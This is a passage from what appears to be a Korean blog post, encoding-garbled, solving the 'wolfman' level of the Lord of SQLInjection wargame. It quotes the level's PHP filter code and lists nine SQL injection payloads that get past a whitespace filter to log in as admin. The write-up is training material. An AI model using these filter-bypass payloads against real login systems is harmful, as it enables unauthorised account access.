ํ‹ฐ์Šคํ† ๋ฆฌ ๋ทฐ

CHALLENGE

[LOS] wolfman ํ’€์ด(5)

๐ŸŒง: 2020. 12. 5.

wolfman ๋ฌธ์ œ๋ฅผ ํ™•์ธํ•ด๋ณด๋ฉด and pw='{$_GET [pw]} ํ•ด๋‹น pw์— ์‚ฝ์ž…๋œ ๊ฐ’์œผ๋กœ ์‹คํ–‰์ด ๋˜๊ณ  ์žˆ์Šต๋‹ˆ๋‹ค.

 

์กฐ๊ธˆ ํŠน์ดํ•œ ์ ์ด ์žˆ๋‹ค๋ฉด ์ „ ๋‹จ๊ณ„์—์„œ๋Š” " admin " ๊ณ„์ •์ด ์ด๋ฏธ ์„ ์–ธ๋œ ์ƒํƒœ์—์„œ ์ง„ํ–‰ํ•˜์˜€์ง€๋งŒ ์ด๋ฒˆ์˜ ๊ฒฝ์šฐ ๊ธฐ๋ณธ์ ์œผ๋กœ " guest " ๊ณ„์ •์œผ๋กœ ์„ ์–ธ๋˜์–ด ์žˆ์Šต๋‹ˆ๋‹ค.

 

if(preg_match('/prob|_|\.|\(\)/i', $_GET [pw])) exit("No Hack ~_~"); 
if(preg_match('/ /i', $_GET[pw])) exit("No whitespace ~_~"); 

๊ฒ€์ฆ๋˜๋Š” ํ•„ํ„ฐ๋ง ํ•จ์ˆ˜๊ฐ€ ๋” ์ถ”๊ฐ€๋˜์—ˆ์Šต๋‹ˆ๋‹ค. ๋‘ ๋ฒˆ์งธ preg_match ์˜์—ญ์„ ๋ณด์‹œ๋ฉด " / / " ์ฆ‰ ๊ณต๋ฐฑ ๊ฒ€์ฆํ•˜๊ณ  ์žˆ๋Š”๊ฒƒ์„ ํ™•์ธํ•˜์‹ค ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค.

 

if($result['id'] == 'admin') solve("wolfman");

๋˜ํ•œ ํ•ด๋‹น ์†Œ์Šค๋ถ€๋ถ„์„ ๋ณด์‹œ๋ฉด ๋ฌธ์ œ๋ฅผ ํ•ด๊ฒฐํ•˜๊ธฐ ์œ„ํ•ด " admin " ์ด๋ผ๋Š” ๊ณ„์ •์œผ๋กœ ์ ‘๊ทผํ•ด์•ผ ๋œ๋‹ค๋Š”๊ฒƒ์„ ์•Œ ์ˆ˜ ์žˆ๊ธฐ ๋•Œ๋ฌธ์—

์ž…๋ ฅํ•  ์ฟผ๋ฆฌ๋ฌธ์— " or  " ๊ตฌ๋ฌธ์„ ์‚ฌ์šฉํ•ด์„œ id=admin์ด๋ผ๋Š” ๊ฒƒ์„ ์„ ์–ธํ•ด์ฃผ๊ณ  ๋‚˜๋จธ์ง€ ๊ตฌ๋ฌธ์€ ๋ชจ๋‘ ์ฃผ์„ ์ฒ˜๋ฆฌํ•˜๋ฉด ๊น”๋”ํ•˜๊ฒŒ ํ•ด๊ฒฐ๋  ๊ฒƒ ๊ฐ™์Šต๋‹ˆ๋‹ค.

 

๊ณต๋ฐฑ ์šฐํšŒ
 pw=(1)'or(id='admin')%23 --> ๊ด„ํ˜ธ์‚ฌ์šฉ
 pw=1'%0dor%0did='admin'%23 --> ์บ๋ฆฌ์ง€๋ฆฌํ„ด(\r)
 pw=1'/**/or/**/id='admin'%23 --> ๋‹ค์ค‘์ฃผ์„
 pw=1'+or+id='admin'%23 --> + ์‚ฌ์šฉ
 pw=1'%09or%09id='admin'%23 --> TAB์‚ฌ์šฉ(\t)
 pw=1'%0aor%0aid='admin'%23 --> Line FEED(\n)
 pw=1'%0bor%0bid='admin'%23 --> instead
 pw=1'%a0or%a0id='admin'%23 --> instead
 pw=1'%0cor%0cid='admin'%23 --> instead

'CHALLENGE' ์นดํ…Œ๊ณ ๋ฆฌ์˜ ๋‹ค๋ฅธ ๊ธ€

XSS Challenges 3  (0) 2020.12.05
[LOS] darkelf ํ’€์ด(6)  (0) 2020.12.05
[LOS] ORC ํ’€์ด(4)  (0) 2020.12.05
[LOS] goblin ํ’€์ด(3)  (0) 2020.12.05
[LOS] cobolt ํ’€์ด(2)  (0) 2020.12.05
๊ณต์œ ํ•˜๊ธฐ ๋งํฌ
Comment